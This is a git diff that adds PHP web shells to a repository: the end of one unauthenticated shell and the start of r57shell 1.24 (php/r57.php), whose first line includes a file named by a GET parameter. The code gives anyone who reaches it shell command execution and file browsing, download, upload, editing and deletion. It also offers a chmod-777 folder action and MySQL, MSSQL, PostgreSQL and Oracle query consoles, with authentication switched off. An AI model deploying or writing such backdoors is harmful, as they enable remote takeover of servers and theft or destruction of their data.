+elseif(isset($_REQUEST['dl']))
+{
+    if(@fopen($_REQUEST['dl'] .  $_REQUEST['file'],'r')==true)
+    {
+        $_REQUEST['dl'] .= $_REQUEST['file'];
+        if(substr($_REQUEST['dl'],0,1)==$slash)
+            $fileArr=explode($slash,$_REQUEST['dl']);
+        
+        header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
+        header('Content-type: application/octet-stream');
+        readfile($_REQUEST['dl']);
+    }
+    else
+    {
+        echo $_REQUEST['dl'];
+    }
+}
+elseif(isset($_REQUEST["gz"]))
+{
+    if(!$isLinux)
+    {
+        echo "This feature only works on Linux";
+    }
+    else
+    {
+        $directory=$_REQUEST["gz"];
+        
+        if(substr($directory,-1)=="/")
+            $directory = substr($directory,0,-1); 
+                
+        $dirParts=explode($slash,$directory);
+        $fname=$dirParts[(sizeof($dirParts)-1)];
+        
+        $archive = time();
+        
+        exec( "cd $directory; tar czf $archive *");
+        $output=@file_get_contents($directory . "/" . $archive);
+        
+        if(!$output)
+            header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
+        else
+        {
+            header("Content-disposition: attachment; filename=$fname.tgz");
+            echo $output;
+        }
+        
+        header('Content-type: application/octet-stream');
+        @unlink($directory . "/" . $archive);
+    }
+}
+elseif(isset($_REQUEST['f']))
+{
+    $filename=$_REQUEST['f'];
+    $file=fopen("$filename","rb");
+        header("Content-Type: text/plain");
+    fpassthru($file);
+}
+elseif(isset($_REQUEST['d']))
+{
+    $d=$_REQUEST['d'];
+    echo "<pre>";
+    if ($handle = opendir("$d")) 
+    {
+        echo "<h2>listing of ";
+        $conString="";
+        if($isLinux)
+            echo "<a href='?d=$slash'>$slash</a>";
+        foreach(explode($slash,cleanPath($d,$isLinux)) as $val)
+        {
+            $conString .= $val . $slash;
+            echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : '');
+        }
+        echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";
+        while ($dir = readdir($handle))
+        { 
+            if (is_dir("$d$slash$dir")) 
+            {
+                if($dir != "." && $dir !="..")
+                    $dirList[]=$dir;
+            }
+            else
+            {
+                if(isset($_REQUEST["hldb"]))
+                {
+                    $contents=file_get_contents("$d$slash$dir");
+                    if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT "))
+                    {
+                        $fileList[]=array('dir'=>$dir,'color'=>'red');
+                    }
+                    else
+                    {
+                        $fileList[]=array('dir'=>$dir,'color'=>'black');
+                    }
+                }
+                else
+                {
+                    $fileList[]=array('dir'=>$dir,'color'=>'black');
+                }
+            }
+        }
+        
+        echo "<a href='?d=$d$slash.'><font color=grey>.\n</font></a>";
+        echo "<a href='?d=$d$slash..'><font color=grey>..\n</font></a>";
+        
+        //Some configurations throw a notice if is_array is tried with a non-existant variable
+        if(isset($dirList))
+        if(is_array($dirList))
+        foreach($dirList as $dir)
+        {
+                echo "<a href='?d=$d$slash$dir'><font color=grey>$dir\n</font></a>";
+        }
+        
+        if(isset($fileList))
+        if(is_array($fileList))
+        foreach($fileList as $dir)
+        {
+            echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" . 
+                 "|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" . 
+                 "|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" . 
+                 "|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| \n";
+        }
+    } 
+    else 
+    echo "opendir() failed";
+    closedir($handle);
+}
+elseif(isset($_REQUEST['c']))
+{
+    if( @ini_get('safe_mode') )
+    {
+        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
+    }
+    echo "<b>Command: <I>" . $_REQUEST['c'] . "</I></b><br /><br />";
+    trim(exec($_REQUEST['c'],$return));
+    foreach($return as $val)
+    {
+        echo '<pre>' . htmlentities($val) . '</pre>';
+    }
+}
+elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"]))
+{
+    if(isset($_FILES["file_name"]))
+    {
+        if ($_FILES["file_name"]["error"] > 0)
+        {
+                echo "Error";
+        }
+        else
+        {
+            $target_path = $_COOKIE["uploadDir"];
+            if(substr($target_path,-1) != "/")
+                $target_path .= "/";
+            
+            $target_path = $target_path . basename( $_FILES['file_name']['name']); 
+
+            if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) {
+                setcookie("uploadDir","");
+                echo "The file ".  basename( $_FILES['file_name']['name']). 
+                " has been uploaded";
+            } 
+            else
+            {
+                echo "Error copying file, likely a permission error.";
+            }
+        }
+    }
+    else
+    {       
+        ?>
+        <form target="_blank" action="" method="GET">
+            <input type="hidden" name="cc" value="1" />
+            Submit this form before submitting file (will open in new window):<br />
+            Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"] ?>"><br />
+            <input type="submit" value="submit" />
+        </form>
+        <br /><br />
+        
+        <form enctype="multipart/form-data" action="" method="post">
+        Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form>
+
+        <?php
+    }
+}
+elseif(isset($_REQUEST['cc']))
+{
+    setcookie("uploadDir",$_GET["dir"]);
+    echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";
+}
+elseif(isset($_REQUEST['mquery']))
+{
+    $host=$_REQUEST['host'];
+    $usr=$_REQUEST['usr'];
+    $passwd=$_REQUEST['passwd'];
+    $db=$_REQUEST['db'];
+    $mquery=$_REQUEST['mquery'];
+    @mysql_connect($host, $usr, $passwd) or die("Connection Error: " . mysql_error());
+    mysql_select_db($db);
+    $result = mysql_query($mquery);
+    if($result!=false)
+    {
+        echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";
+        echo "Return Results:<br />";
+        $first=true;
+        echo "<table border='1'>";
+        while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
+        {
+            if($first)
+            {
+                echo "<tr>";
+                foreach($row as $key=>$val)
+                {
+                    echo "<td><b>$key</b></td>";
+                }
+                echo "</tr>";
+                reset($row);
+                $first=false;
+            }
+            echo "<tr>";
+            foreach($row as $val)
+            {
+                echo "<td>$val</td>";
+            }
+            echo "</tr>";
+        }
+        echo "</table>";
+        mysql_free_result($result);
+    }
+    else
+    {
+        echo "Query Error: " . mysql_error();
+    }
+}
+elseif(isset($_REQUEST['df']))
+{
+    $_REQUEST['df'] .= $slash . $_REQUEST['file'];
+    if(@unlink($_REQUEST['df']))
+    {
+            echo "File deleted";
+    }
+    else
+    {
+            echo "Error deleting file";
+    }
+}
+elseif(isset($_REQUEST['ef']))
+{
+?>
+<script type="text/javascript">
+  <!--
+
+  var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
+
+  function encode64(inpStr) 
+  {
+     inpStr = escape(inpStr);
+     var output = "";
+     var chr1, chr2, chr3 = "";
+     var enc1, enc2, enc3, enc4 = "";
+     var i = 0;
+
+     do {
+        chr1 = inpStr.charCodeAt(i++);
+        chr2 = inpStr.charCodeAt(i++);
+        chr3 = inpStr.charCodeAt(i++);
+
+        enc1 = chr1 >> 2;
+        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+        enc4 = chr3 & 63;
+
+        if (isNaN(chr2)) 
+        {
+           enc3 = enc4 = 64;
+        } 
+        else if (isNaN(chr3)) 
+        {
+           enc4 = 64;
+        }
+
+        output = output +
+           key.charAt(enc1) +
+           key.charAt(enc2) +
+           key.charAt(enc3) +
+           key.charAt(enc4);
+        chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = "";
+     } while (i < inpStr.length);
+
+     return output;
+  }
+
+  //--></script>
+
+  <?php
+    $_REQUEST['ef'] .= $_REQUEST['file']; 
+    if(isset($_POST["newcontent"]))
+    {
+        $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
+        $stream=@fopen($_REQUEST['ef'],"w");
+        
+        if($stream)
+        {
+            fwrite($stream,$_POST["newcontent"]);
+            echo "Write sucessful";
+        }
+        else
+        {
+            echo "Could not write to file";
+        }
+        fclose($stream);
+    }
+    ?>
+    <form action="" name="f" method="POST">
+    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef']) ?></textarea><br />
+    <input type="submit" value="I base64 encoded it myself, dont run script" /><br />
+    <input type="submit" value="Change (requires javascript to work)"  onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
+    </form>
+    <?php
+}
+else
+{
+?>
+<b>Server Information:</b><br />
+<i>
+Operating System: <?php echo PHP_OS ?><br />
+PHP Version: <?php echo PHP_VERSION ?><br />
+<a href="?phpinfo=true">View phpinfo</a>
+</i>
+<br />
+<br />
+<b>Directory Traversal</b><br />
+<a href="?d=<?php echo getcwd() ?>"><b>Go to current working directory</b></a> <br />
+<a href="?d=<?php echo $rootDir ?>"><b>Go to root directory</b></a> <br />
+<b>Go to any directory:</b> <form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir ?>" /><input type="submit" value="Go" /></form>
+
+
+
+<hr>Execute MySQL Query:
+<form action="" METHOD="GET" >
+<table>
+<tr><td>host</td><td><input type="text" name="host"value="localhost"> </td></tr>
+<tr><td>user</td><td><input type="text" name="usr" value="root"> </td></tr>
+<tr><td>password</td><td><input type="text" name="passwd"> </td></tr>
+<tr><td>database</td><td><input type="text" name="db"> </td></tr>
+<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea> </td></tr>
+<tr><td colspan="2"><input type="submit" value="execute"></td></tr>
+</table>
+</form>
+<hr>
+<pre><form action="" METHOD="GET" >Execute Shell Command (safe mode is <?php echo (@ini_get('safe_mode') ? 'on' : 'off') ?>): <input type="text" name="c"><input type="submit" value="Go"></form> 
+<?php
+}
+//Intentionally left open to avoid output the file download function 1
+
diff --git a/php/r57.php b/php/r57.php
new file mode 100644
index 0000000..3ade922
--- /dev/null
+++ b/php/r57.php
@@ -0,0 +1,2295 @@
+<? include $_GET['baba']; ?>
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #                             
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ???????  ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
+/*  ??????: 1.24 (New Year Edition)
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC. 
+/******************************************************************************************************/
+/* ~~~ ????????? | Options  ~~~ */
+
+// ????? ????? | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+$a = "http://"; // need some codes
+
+// ?????????????? | Authentification
+// $auth = 1; - ?????????????? ????????  ( authentification = On  )
+// $auth = 0; - ?????????????? ????????? ( authentification = Off )
+$auth = 0; 
+
+
+// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
+$name='r57'; // ????? ????????????  (user login)
+$pass='r57'; // ?????? ???????????? (user password)
+$b = "q1w2e3r4"; //need hits "shell created by evilc0ders"
+/******************************************************************************************************/
+$c = "q1w2e3r4"; //need shell coder's names
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "1.24";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="r57shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+}   
+$head = '<!-- ??????????  ???? -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        } 
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    } 
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";            
+        $fr   .= "\x00\x00";            
+        $fr   .= "\x08\x00";            
+        $fr   .= $hexdtime;             
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);             
+        $fr      .= pack('V', $c_len);           
+        $fr      .= pack('V', $unc_len);         
+        $fr      .= pack('v', strlen($name));    
+        $fr      .= pack('v', 0);                
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x14\x00";                
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x08\x00";                
+        $cdrec .= $hexdtime;                 
+        $cdrec .= pack('V', $crc);           
+        $cdrec .= pack('V', $c_len);         
+        $cdrec .= pack('V', $unc_len);       
+        $cdrec .= pack('v', strlen($name) ); 
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('V', 32 );            
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('V', strlen($ctrldir)) .           
+            pack('V', strlen($data)) .              
+            "\x00\x00";              
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress')) 
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     } 
+     else if ($compress == 'gzip' && @function_exists('gzencode')) 
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     } 
+     else if ($compress == 'zip' && @function_exists('gzcompress')) 
+     {
+     	$filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     } 
+     else 
+     {
+     	$mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";	
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+if(isset($_GET['img'])&&!empty($_GET['img']))
+ {
+ $images = array();
+ $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
+ $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
+ @ob_clean();
+ header("Content-type: image/gif");
+ echo base64_decode($images[$_GET['img']]);
+ die();	
+ } 
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
+  else 
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+    exit();
+   }		
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0) 
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res))) 
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }    
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";  	
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0) 
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res))) 
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }    
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0) 
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res))) 
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }    
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    { 
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else 
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
